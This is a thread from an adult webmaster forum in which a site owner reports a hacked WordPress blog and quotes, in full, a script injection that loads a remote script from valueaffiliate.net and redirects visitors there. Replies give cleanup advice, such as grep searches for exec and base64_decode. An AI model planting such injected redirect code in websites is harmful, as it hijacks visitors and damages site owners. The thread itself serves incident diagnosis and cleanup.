Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 10-03-2011, 04:56 PM   #1
Telly
Confirmed User
 
Telly's Avatar
 
Industry Role:
Join Date: Jul 2007
Posts: 334
PHP Injection?!?! http://valueaffiliate.net/abp

I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp

It appears that this is some kind of cloaking injection on the index.php:
<script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript>

Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated!

Telly
__________________

MetroMoney.com - Limited-time $40PPS Promotion!
DeviantHardcore.com
Telly is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 04:57 PM   #2
AzteK
Confirmed User
 
AzteK's Avatar
 
Industry Role:
Join Date: Feb 2001
Location: Northern Cali, USA
Posts: 3,439
ugh my antivirus just blocked this
__________________
WANTED: Buying Blog Posts and Links
AzteK is online now   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 04:58 PM   #3
SASCH
Confirmed User
 
Industry Role:
Join Date: Jul 2011
Posts: 107
You using WordPress?
SASCH is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 05:13 PM   #4
Telly
Confirmed User
 
Telly's Avatar
 
Industry Role:
Join Date: Jul 2007
Posts: 334
Quote:
Originally Posted by SASCH View Post
You using WordPress?
Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.
__________________

MetroMoney.com - Limited-time $40PPS Promotion!
DeviantHardcore.com
Telly is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 06:01 PM   #5
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 55,267
Quote:
Originally Posted by Telly View Post
Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.
download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 10:36 PM   #6
Telly
Confirmed User
 
Telly's Avatar
 
Industry Role:
Join Date: Jul 2007
Posts: 334
Quote:
Originally Posted by fris View Post
download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.
Thank you!
__________________

MetroMoney.com - Limited-time $40PPS Promotion!
DeviantHardcore.com
Telly is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-03-2011, 10:39 PM   #7
Mr Pheer
Living inside your head.
 
Mr Pheer's Avatar
 
Industry Role:
Join Date: Dec 2002
Location: In your AirBNB
Posts: 20,561
I'd like to kill the fuckin assholes that do this type of shit.
Mr Pheer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-04-2011, 12:16 PM   #8
Telly
Confirmed User
 
Telly's Avatar
 
Industry Role:
Join Date: Jul 2007
Posts: 334
Quote:
Originally Posted by Mr Pheer View Post
I'd like to kill the fuckin assholes that do this type of shit.
heh "like"
__________________

MetroMoney.com - Limited-time $40PPS Promotion!
DeviantHardcore.com
Telly is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 05:25 AM   #9
scouser
marketer.
 
Industry Role:
Join Date: Aug 2006
Location: bcn
Posts: 2,280
do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.
scouser is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 06:40 AM   #10
iSpyCams
Amateur Gynecologist
 
Industry Role:
Join Date: May 2009
Location: Medellin
Posts: 4,436
a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.
iSpyCams is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 06:42 AM   #11
Brujah
Beer Money Baron
 
Brujah's Avatar
 
Industry Role:
Join Date: Jan 2001
Location: brujah / gmail
Posts: 22,157
You may also need to clear any cache folders, like supercache, etc..
__________________
Brujah is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 06:50 AM   #12
seeandsee
Check SIG!
 
seeandsee's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
problem is how you got hacked, is it host, is it ftp, is it script...
__________________
BUY MY SIG - 50$/Year

Contact here
seeandsee is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 06:51 AM   #13
vdbucks
Monger Cash
 
Industry Role:
Join Date: Jul 2010
Posts: 2,773
Quote:
Originally Posted by deadmoon View Post
do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.
xargs is faster ^^

for example... cd to blog root directory then

find . | xargs grep 'exec'

Last edited by vdbucks; 10-05-2011 at 06:52 AM..
vdbucks is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2011, 08:02 AM   #14
fris
Too lazy to set a custom title
 
fris's Avatar
 
Industry Role:
Join Date: Aug 2002
Posts: 55,267
shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.

this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself.
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.